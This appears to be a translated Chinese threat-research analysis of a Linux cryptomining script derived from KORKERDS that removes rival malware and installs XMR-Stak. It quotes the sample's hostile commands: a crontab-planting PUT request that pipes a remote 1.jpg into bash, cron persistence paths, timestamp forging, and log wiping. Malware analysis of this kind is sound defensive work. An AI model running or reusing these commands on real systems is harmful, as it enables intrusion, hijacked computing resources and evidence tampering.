复制自KORKERDS的挖矿脚本移除了KORKERDS相关的所有挖矿机和服务

研究人员在进行程序日志检查时发现，蜜罐钟有恶意脚本下载恶意二进制文件。进一步分析之后，研究人员发现该脚本可以删除大量已知的Linux恶意软件、挖矿脚本和其他挖矿服务相关的端口和链接，而且该脚本与Xbash和KORKERDS有相似和关联。该恶意脚本会下载加密货币挖矿恶意软件并植入到系统中，使用crontab来确保系统重启和删除后的驻留问题。

图1. 从域名下载的脚本，蜜罐中的日志信息

恶意脚本分析

该恶意脚本会下载二进制文件，分析之后发现它是KORKERDS的变种，是对2018年11月的KORKERDS收集的样本的修改版本，对该恶意软件做出了适当的添加和删除。与KORKERDS相比，新脚本并不会卸载系统中安装的安全产品，也不会安装rootkit工具。反而KORKERDS挖矿脚本和rootkit都是kill list中。该脚本会删除它所复制的恶意软件的所有组件和挖矿进程。

图2. 从 KORKERDS复制的脚本分析

图3.新版本中KORKERDS的rootkit被移除

该脚本会下载加密货币挖矿机XMR-Stak的修改版二进制文件，XMR-Stak挖矿机支持CPU、AMD、GPU等进行加密货币挖矿。研究人员对感染过程进行分析发现，恶意脚本首先从一些IP摄像头和web服务在TCP 8161端口上上传crontab文件：

PUT /fileserver/vMROB4ZhfLTljleL HTTP/1.1
Host: xxx.xxx.127.221:8161
Accept: */*
Content-Length: 105
Content-Type: application/x-www-form-urlencoded*/10 * * * * root (curl -fsSL 
hxxp://yxarsh.shop/1.jpg||wget -q -O- hxxp://yxarsh.shop/1.jpg)|bash -sh
##

该crontab文件会下载和运行shell脚本1.jpg，启用3个函数：函数B，函数D和函数C。

函数B会kill掉之前安装的恶意软件、加密货币挖矿机和恶意软件相关的所有服务。然后创建新的目录、文件，并停止与已知相关IP地址的连接。

图4. 加密货币挖矿机脚本kill掉之前安装的恶意软件、加密货币挖矿机和相关服务

函数D会从hxxp://yxarsh.shop/64下载加密货币挖矿机二进制文件，并安装。

函数C会从hxxp://yxarsh.shop/0下载脚本，并保存为/usr/local/bin/dns，然后创建新的crontab文件在上午1点来调用脚本。并从hxxp://yxarsh.shop/1.jpg下载1.jpg，并放在不同的crontab中：

/etc/cron.d/root
/var/spool/cron/root
/etc/cron.d/apache
/var/spool/cron/crontabs/root
/etc/cron.hourly/oanacroner
/etc/cron.daily/oanacroner
/etc/cron.monthly/oanacroner

通过 /bin/sh文件对文件的修改时间和最后访问时间进行修改。

touch -acmr /bin/sh /etc/cron.hourly/oanacroner

 将恶意软件自身植入到系统中来确保重启和被删除后仍然可以驻留在系统，将日志文件内容修改为0：

echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron

与KORKERDS样本相比，新脚本会简化程序来下载和执行文件，安装加密货币挖矿机到系统中。分析程序的传播发现，大多数的代码都来自于KORKERDS脚本，base64编码的脚本可以在hxxps://pastebin.com/u/SYSTEAM处查看。

研究人员发现这里有一个区别，就是PUT URL /fileserver/vMROB4ZhfLTljleL和真实的crontab之间缺一个链接。KORKERDS是直接保存crontab，新脚本只插入一个取回所有代码和加密货币挖矿机的crontab。

图5. 脚本复制自KORKERDS的Python脚本来进行传播

结论

恶意软件含有移除其他具有竞争关系的恶意软件的功能并不少见，但研究人员从未见过如此大规模地从系统中移除Linux恶意软件。移除具有竞争关系的恶意软件也只是犯罪分子最大化利益的手段之一。企业可以通过从合法供应商处获取最新的补丁来确保系统免受此类攻击。另外，加密货币挖矿恶意软件或挖矿机会使用大量的CPU和GPU资源，这会使系统运行非常缓慢。因此，企业需要多层保护机制来检测、预防和解决恶意软件感染的问题，并停止影响未来和企业正常运行所需的恶意软件感染。